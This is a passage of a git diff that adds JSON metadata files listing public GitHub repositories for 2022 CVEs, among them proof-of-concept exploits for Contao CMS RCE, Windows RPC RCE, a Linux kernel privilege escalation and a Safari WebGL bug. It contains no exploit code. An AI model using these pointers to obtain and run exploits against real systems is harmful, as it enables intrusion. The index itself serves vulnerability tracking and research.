"updated_at": "2024-08-12T20:25:34Z", + "pushed_at": "2022-07-28T09:59:27Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 519447006, + "name": "CVE-2022-26138", + "full_name": "z92g\/CVE-2022-26138", + "owner": { + "login": "z92g", + "id": 108780847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108780847?v=4", + "html_url": "https:\/\/github.com\/z92g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/z92g\/CVE-2022-26138", + "description": "Confluence Hardcoded Password POC", + "fork": false, + "created_at": "2022-07-30T07:14:52Z", + "updated_at": "2024-11-16T19:52:33Z", + "pushed_at": "2022-07-30T08:00:43Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 531330961, + "name": "CVE-2022-26138", + "full_name": "shavchen\/CVE-2022-26138", + "owner": { + "login": "shavchen", + "id": 34539839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34539839?v=4", + "html_url": "https:\/\/github.com\/shavchen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shavchen\/CVE-2022-26138", + "description": null, + "fork": false, + "created_at": "2022-09-01T02:16:15Z", + "updated_at": "2022-09-23T14:42:23Z", + "pushed_at": "2022-07-22T06:42:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26159.json b/2022/CVE-2022-26159.json new file mode 100644 index 0000000000..4cc0616f60 --- /dev/null +++ b/2022/CVE-2022-26159.json @@ -0,0 +1,39 @@ +[ + { + "id": 462012382, + "name": "CVE-2022-26159-Ametys-Autocompletion-XML", + "full_name": "p0dalirius\/CVE-2022-26159-Ametys-Autocompletion-XML", + "owner": { + "login": "p0dalirius", + "id": 79218792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79218792?v=4", + "html_url": "https:\/\/github.com\/p0dalirius", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/p0dalirius\/CVE-2022-26159-Ametys-Autocompletion-XML", + "description": "A python exploit to automatically dump all the data stored by the auto-completion plugin of Ametys CMS to a local sqlite database file. ", + "fork": false, + "created_at": "2022-02-21T19:59:11Z", + "updated_at": "2024-08-12T20:20:55Z", + "pushed_at": "2022-05-03T10:40:26Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "ametys", + "autocompletion", + "cms", + "exploit", + "plugin" + ], + "visibility": "public", + "forks": 3, + "watchers": 12, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26265.json b/2022/CVE-2022-26265.json new file mode 100644 index 0000000000..7244bcd542 --- /dev/null +++ b/2022/CVE-2022-26265.json @@ -0,0 +1,71 @@ +[ + { + "id": 573201113, + "name": "CVE-2022-26265", + "full_name": "Inplex-sys\/CVE-2022-26265", + "owner": { + "login": "Inplex-sys", + "id": 69421356, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69421356?v=4", + "html_url": "https:\/\/github.com\/Inplex-sys", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Inplex-sys\/CVE-2022-26265", + "description": "The first proof of concept of the Contao CMS RCE", + "fork": false, + "created_at": "2022-12-01T23:11:19Z", + "updated_at": "2023-04-11T15:59:29Z", + "pushed_at": "2022-12-03T11:58:30Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "contao-cms", + "contao-exploit", + "cve", + "exploit", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623880121, + "name": "CVE-2022-26265", + "full_name": "redteamsecurity2023\/CVE-2022-26265", + "owner": { + "login": "redteamsecurity2023", + "id": 129942969, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/129942969?v=4", + "html_url": "https:\/\/github.com\/redteamsecurity2023", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redteamsecurity2023\/CVE-2022-26265", + "description": "The first proof of concept of the Contao CMS RCE", + "fork": false, + "created_at": "2023-04-05T09:34:29Z", + "updated_at": "2023-04-05T09:37:01Z", + "pushed_at": "2023-04-05T09:36:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26269.json b/2022/CVE-2022-26269.json new file mode 100644 index 0000000000..056d8efadc --- /dev/null +++ b/2022/CVE-2022-26269.json @@ -0,0 +1,33 @@ +[ + { + "id": 475102140, + "name": "CVE-2022-26269", + "full_name": "nsbogam\/CVE-2022-26269", + "owner": { + "login": "nsbogam", + "id": 7817473, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7817473?v=4", + "html_url": "https:\/\/github.com\/nsbogam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nsbogam\/CVE-2022-26269", + "description": "Suzuki connect app is used to get the car information like Fuel, Ignition status, Current location, Seat buckle status etc. In Ignis, Zeta variant car if the Fuel CAN messages and Seat buckle status is spoofed via OBD 2 port with the crafted value (e.g. zero percent fuel and Car seat is buckled ), then the same value is reflected on Suzuki connect app, which can mislead the user.", + "fork": false, + "created_at": "2022-03-28T17:10:24Z", + "updated_at": "2022-03-29T04:36:35Z", + "pushed_at": "2022-06-17T08:50:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26318.json b/2022/CVE-2022-26318.json new file mode 100644 index 0000000000..ac9b17cfa6 --- /dev/null +++ b/2022/CVE-2022-26318.json @@ -0,0 +1,95 @@ +[ + { + "id": 474960129, + "name": "watchguard_cve-2022-26318", + "full_name": "misterxid\/watchguard_cve-2022-26318", + "owner": { + "login": "misterxid", + "id": 44462886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44462886?v=4", + "html_url": "https:\/\/github.com\/misterxid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/misterxid\/watchguard_cve-2022-26318", + "description": null, + "fork": false, + "created_at": "2022-03-28T10:53:38Z", + "updated_at": "2024-10-13T21:22:11Z", + "pushed_at": "2022-03-28T10:55:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 482892577, + "name": "Watchguard-RCE-POC-CVE-2022-26318", + "full_name": "h3llk4t3\/Watchguard-RCE-POC-CVE-2022-26318", + "owner": { + "login": "h3llk4t3", + "id": 58104960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58104960?v=4", + "html_url": "https:\/\/github.com\/h3llk4t3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3llk4t3\/Watchguard-RCE-POC-CVE-2022-26318", + "description": "Watchguard RCE POC CVE-2022-26318", + "fork": false, + "created_at": "2022-04-18T15:14:30Z", + "updated_at": "2024-08-12T20:22:33Z", + "pushed_at": "2022-04-18T15:19:09Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 494768830, + "name": "CVE-2022-26318", + "full_name": "BabyTeam1024\/CVE-2022-26318", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2022-26318", + "description": null, + "fork": false, + "created_at": "2022-05-21T11:51:58Z", + "updated_at": "2022-08-24T12:23:47Z", + "pushed_at": "2022-05-21T11:55:55Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26377.json b/2022/CVE-2022-26377.json new file mode 100644 index 0000000000..876afc0851 --- /dev/null +++ b/2022/CVE-2022-26377.json @@ -0,0 +1,33 @@ +[ + { + "id": 785525373, + "name": "ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "full_name": "watchtowrlabs\/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "owner": { + "login": "watchtowrlabs", + "id": 99977116, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99977116?v=4", + "html_url": "https:\/\/github.com\/watchtowrlabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/watchtowrlabs\/ibm-qradar-ajp_smuggling_CVE-2022-26377_poc", + "description": null, + "fork": false, + "created_at": "2024-04-12T03:59:03Z", + "updated_at": "2024-06-27T09:27:36Z", + "pushed_at": "2024-04-12T04:05:19Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-2639.json b/2022/CVE-2022-2639.json new file mode 100644 index 0000000000..7e7991dcb6 --- /dev/null +++ b/2022/CVE-2022-2639.json @@ -0,0 +1,126 @@ +[ + { + "id": 532959565, + "name": "CVE-2022-2639-PipeVersion", + "full_name": "bb33bb\/CVE-2022-2639-PipeVersion", + "owner": { + "login": "bb33bb", + "id": 5463104, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5463104?v=4", + "html_url": "https:\/\/github.com\/bb33bb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bb33bb\/CVE-2022-2639-PipeVersion", + "description": "CVE-2022-2639 Linux kernel openvswitch local privilege escalation", + "fork": false, + "created_at": "2022-09-05T15:31:56Z", + "updated_at": "2024-10-27T23:14:05Z", + "pushed_at": "2022-09-05T14:25:17Z", + "stargazers_count": 108, + "watchers_count": 108, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 108, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 557306150, + "name": "Detection-and-Mitigation-for-CVE-2022-2639", + "full_name": "EkamSinghWalia\/Detection-and-Mitigation-for-CVE-2022-2639", + "owner": { + "login": "EkamSinghWalia", + "id": 106553324, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106553324?v=4", + "html_url": "https:\/\/github.com\/EkamSinghWalia", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EkamSinghWalia\/Detection-and-Mitigation-for-CVE-2022-2639", + "description": null, + "fork": false, + "created_at": "2022-10-25T12:59:31Z", + "updated_at": "2022-11-11T16:24:32Z", + "pushed_at": "2022-10-25T13:07:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 752952146, + "name": "-2022-LOCALROOT-CVE-2022-2639", + "full_name": "letsr00t\/-2022-LOCALROOT-CVE-2022-2639", + "owner": { + "login": "letsr00t", + "id": 38699989, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38699989?v=4", + "html_url": "https:\/\/github.com\/letsr00t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/letsr00t\/-2022-LOCALROOT-CVE-2022-2639", + "description": null, + "fork": false, + "created_at": "2024-02-05T07:10:51Z", + "updated_at": "2024-02-05T07:10:51Z", + "pushed_at": "2024-02-05T07:25:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 879447823, + "name": "CVE-2022-2639-PipeVersion", + "full_name": "devetop\/CVE-2022-2639-PipeVersion", + "owner": { + "login": "devetop", + "id": 62440997, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62440997?v=4", + "html_url": "https:\/\/github.com\/devetop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/devetop\/CVE-2022-2639-PipeVersion", + "description": null, + "fork": false, + "created_at": "2024-10-27T23:14:48Z", + "updated_at": "2024-10-27T23:15:41Z", + "pushed_at": "2024-10-27T23:32:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26485.json b/2022/CVE-2022-26485.json new file mode 100644 index 0000000000..5d6c4e1554 --- /dev/null +++ b/2022/CVE-2022-26485.json @@ -0,0 +1,33 @@ +[ + { + "id": 595523904, + "name": "CVE-2022-26485", + "full_name": "mistymntncop\/CVE-2022-26485", + "owner": { + "login": "mistymntncop", + "id": 105329747, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105329747?v=4", + "html_url": "https:\/\/github.com\/mistymntncop", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mistymntncop\/CVE-2022-26485", + "description": null, + "fork": false, + "created_at": "2023-01-31T09:01:17Z", + "updated_at": "2024-09-26T14:02:41Z", + "pushed_at": "2023-01-31T09:10:21Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 19, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26488.json b/2022/CVE-2022-26488.json new file mode 100644 index 0000000000..6a87c0eb23 --- /dev/null +++ b/2022/CVE-2022-26488.json @@ -0,0 +1,33 @@ +[ + { + "id": 633237667, + "name": "PyPATHPwner", + "full_name": "techspence\/PyPATHPwner", + "owner": { + "login": "techspence", + "id": 7014376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7014376?v=4", + "html_url": "https:\/\/github.com\/techspence", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/techspence\/PyPATHPwner", + "description": "POC Exploit for CVE-2022-26488 - Python for Windows (CPython) escalation of privilege vulnerability, discovered by the Lockheed Martin Red Team.", + "fork": false, + "created_at": "2023-04-27T04:30:29Z", + "updated_at": "2023-08-17T16:20:03Z", + "pushed_at": "2023-04-27T04:35:57Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26503.json b/2022/CVE-2022-26503.json new file mode 100644 index 0000000000..1e8b69b438 --- /dev/null +++ b/2022/CVE-2022-26503.json @@ -0,0 +1,33 @@ +[ + { + "id": 470522813, + "name": "CVE-2022-26503", + "full_name": "sinsinology\/CVE-2022-26503", + "owner": { + "login": "sinsinology", + "id": 77316200, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4", + "html_url": "https:\/\/github.com\/sinsinology", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sinsinology\/CVE-2022-26503", + "description": null, + "fork": false, + "created_at": "2022-03-16T09:54:16Z", + "updated_at": "2024-10-12T16:14:32Z", + "pushed_at": "2022-03-16T10:06:42Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26629.json b/2022/CVE-2022-26629.json new file mode 100644 index 0000000000..f387402cae --- /dev/null +++ b/2022/CVE-2022-26629.json @@ -0,0 +1,64 @@ +[ + { + "id": 473891141, + "name": "CVE-2022-26629", + "full_name": "scopion\/CVE-2022-26629", + "owner": { + "login": "scopion", + "id": 27413591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4", + "html_url": "https:\/\/github.com\/scopion", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scopion\/CVE-2022-26629", + "description": null, + "fork": false, + "created_at": "2022-03-25T06:16:09Z", + "updated_at": "2022-03-26T06:05:07Z", + "pushed_at": "2022-03-25T05:14:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 474258525, + "name": "CVE-2022-26629", + "full_name": "sysenter-eip\/CVE-2022-26629", + "owner": { + "login": "sysenter-eip", + "id": 94691823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94691823?v=4", + "html_url": "https:\/\/github.com\/sysenter-eip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sysenter-eip\/CVE-2022-26629", + "description": null, + "fork": false, + "created_at": "2022-03-26T06:06:05Z", + "updated_at": "2022-03-26T06:09:21Z", + "pushed_at": "2022-03-26T06:09:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26717.json b/2022/CVE-2022-26717.json new file mode 100644 index 0000000000..9ad1941d62 --- /dev/null +++ b/2022/CVE-2022-26717.json @@ -0,0 +1,33 @@ +[ + { + "id": 493876957, + "name": "CVE-2022-26717-Safari-WebGL-Exploit", + "full_name": "theori-io\/CVE-2022-26717-Safari-WebGL-Exploit", + "owner": { + "login": "theori-io", + "id": 18063559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18063559?v=4", + "html_url": "https:\/\/github.com\/theori-io", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theori-io\/CVE-2022-26717-Safari-WebGL-Exploit", + "description": null, + "fork": false, + "created_at": "2022-05-19T01:16:01Z", + "updated_at": "2024-08-12T20:23:22Z", + "pushed_at": "2022-05-19T01:17:07Z", + "stargazers_count": 56, + "watchers_count": 56, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 56, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26726.json b/2022/CVE-2022-26726.json new file mode 100644 index 0000000000..c3ecd41baf --- /dev/null +++ b/2022/CVE-2022-26726.json @@ -0,0 +1,64 @@ +[ + { + "id": 440738472, + "name": "CVE-2022-26726-POC", + "full_name": "acheong08\/CVE-2022-26726-POC", + "owner": { + "login": "acheong08", + "id": 36258159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36258159?v=4", + "html_url": "https:\/\/github.com\/acheong08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acheong08\/CVE-2022-26726-POC", + "description": "TCC Bypass", + "fork": false, + "created_at": "2021-12-22T05:03:29Z", + "updated_at": "2024-09-27T17:08:20Z", + "pushed_at": "2023-01-08T08:04:38Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 20, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 481522243, + "name": "CVE-2022-26726-POC2", + "full_name": "acheong08\/CVE-2022-26726-POC2", + "owner": { + "login": "acheong08", + "id": 36258159, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36258159?v=4", + "html_url": "https:\/\/github.com\/acheong08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/acheong08\/CVE-2022-26726-POC2", + "description": null, + "fork": false, + "created_at": "2022-04-14T08:15:28Z", + "updated_at": "2024-02-28T04:31:06Z", + "pushed_at": "2022-04-14T11:21:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26757.json b/2022/CVE-2022-26757.json new file mode 100644 index 0000000000..2d977159ce --- /dev/null +++ b/2022/CVE-2022-26757.json @@ -0,0 +1,33 @@ +[ + { + "id": 504198360, + "name": "flow_divert", + "full_name": "Dylbin\/flow_divert", + "owner": { + "login": "Dylbin", + "id": 94767639, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94767639?v=4", + "html_url": "https:\/\/github.com\/Dylbin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Dylbin\/flow_divert", + "description": "Flow Divert Race Condition Bug (CVE-2022-26757) discovered by @nedwill", + "fork": false, + "created_at": "2022-06-16T14:58:25Z", + "updated_at": "2023-12-29T03:47:20Z", + "pushed_at": "2022-06-16T15:00:13Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26763.json b/2022/CVE-2022-26763.json new file mode 100644 index 0000000000..3b8deebc5a --- /dev/null +++ b/2022/CVE-2022-26763.json @@ -0,0 +1,33 @@ +[ + { + "id": 509675215, + "name": "PCICrash", + "full_name": "zhuowei\/PCICrash", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/PCICrash", + "description": "PCIDriverKit proof-of-concept for CVE-2022-26763", + "fork": false, + "created_at": "2022-07-02T06:15:29Z", + "updated_at": "2023-09-10T07:56:41Z", + "pushed_at": "2022-07-02T06:15:40Z", + "stargazers_count": 38, + "watchers_count": 38, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 38, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26766.json b/2022/CVE-2022-26766.json new file mode 100644 index 0000000000..c4dcad4fb7 --- /dev/null +++ b/2022/CVE-2022-26766.json @@ -0,0 +1,33 @@ +[ + { + "id": 509675427, + "name": "CoreTrustDemo", + "full_name": "zhuowei\/CoreTrustDemo", + "owner": { + "login": "zhuowei", + "id": 704768, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/704768?v=4", + "html_url": "https:\/\/github.com\/zhuowei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zhuowei\/CoreTrustDemo", + "description": "Proof-of-concept for CVE-2022-26766 on macOS 12.3.1", + "fork": false, + "created_at": "2022-07-02T06:16:33Z", + "updated_at": "2024-08-26T16:04:07Z", + "pushed_at": "2022-07-02T17:14:41Z", + "stargazers_count": 84, + "watchers_count": 84, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 84, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2022/CVE-2022-26809.json b/2022/CVE-2022-26809.json new file mode 100644 index 0000000000..59a3303208 --- /dev/null +++ b/2022/CVE-2022-26809.json @@ -0,0 +1,316 @@ +[ + { + "id": 481455739, + "name": "Microsoft-CVE-2022-26809-The-Little-Boy", + "full_name": "sherlocksecurity\/Microsoft-CVE-2022-26809-The-Little-Boy", + "owner": { + "login": "sherlocksecurity", + "id": 52328067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52328067?v=4", + "html_url": "https:\/\/github.com\/sherlocksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sherlocksecurity\/Microsoft-CVE-2022-26809-The-Little-Boy", + "description": "The poc for CVE-2022-26809 RCE via RPC will be updated here. ", + "fork": false, + "created_at": "2022-04-14T03:41:32Z", + "updated_at": "2022-12-24T12:28:52Z", + "pushed_at": "2022-04-18T03:28:10Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 20, + "score": 0, + "subscribers_count": 30 + }, + { + "id": 481521334, + "name": "CVE-2022-26809", + "full_name": "websecnl\/CVE-2022-26809", + "owner": { + "login": "websecnl", + "id": 20278695, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20278695?v=4", + "html_url": "https:\/\/github.com\/websecnl", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/websecnl\/CVE-2022-26809", + "description": "Remote Code Execution Exploit in the RPC Library", + "fork": false, + "created_at": "2022-04-14T08:12:24Z", + "updated_at": "2024-09-02T21:30:15Z", + "pushed_at": "2022-04-19T17:04:04Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-26809" + ], + "visibility": "public", + "forks": 3, + "watchers": 26, + "score": 0, + "subscribers_count": 18 + }, + { + "id": 481523929, + "name": "CVE-2022-26809", + "full_name": "auduongxuan\/CVE-2022-26809", + "owner": { + "login": "auduongxuan", + "id": 33758982, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33758982?v=4", + "html_url": "https:\/\/github.com\/auduongxuan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/auduongxuan\/CVE-2022-26809", + "description": null, + "fork": false, + "created_at": "2022-04-14T08:21:10Z", + "updated_at": "2024-08-12T20:22:24Z", + "pushed_at": "2022-04-14T08:23:59Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 481682449, + "name": "cve-2022-26809", + "full_name": "corelight\/cve-2022-26809", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/cve-2022-26809", + "description": "Detects attempts and successful exploitation of CVE-2022-26809", + "fork": false, + "created_at": "2022-04-14T16:58:09Z", + "updated_at": "2024-10-12T10:26:20Z", + "pushed_at": "2024-09-16T15:44:34Z", + "stargazers_count": 32, + "watchers_count": 32, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 32, + "score": 0, + "subscribers_count": 15 + }, + { + "id": 483810303, + "name": "CVE-2022-26809-RCE", + "full_name": "quijadajose\/CVE-2022-26809-RCE", + "owner": { + "login": "quijadajose", + "id": 57696252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57696252?v=4", + "html_url": "https:\/\/github.com\/quijadajose", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/quijadajose\/CVE-2022-26809-RCE", + "description": "This repository contains a PoC for remote code execution CVE-2022-26809", + "fork": false, + "created_at": "2022-04-20T20:54:26Z", + "updated_at": "2024-10-12T00:40:22Z", + "pushed_at": "2022-04-25T20:38:57Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 5, + "allow_forking": 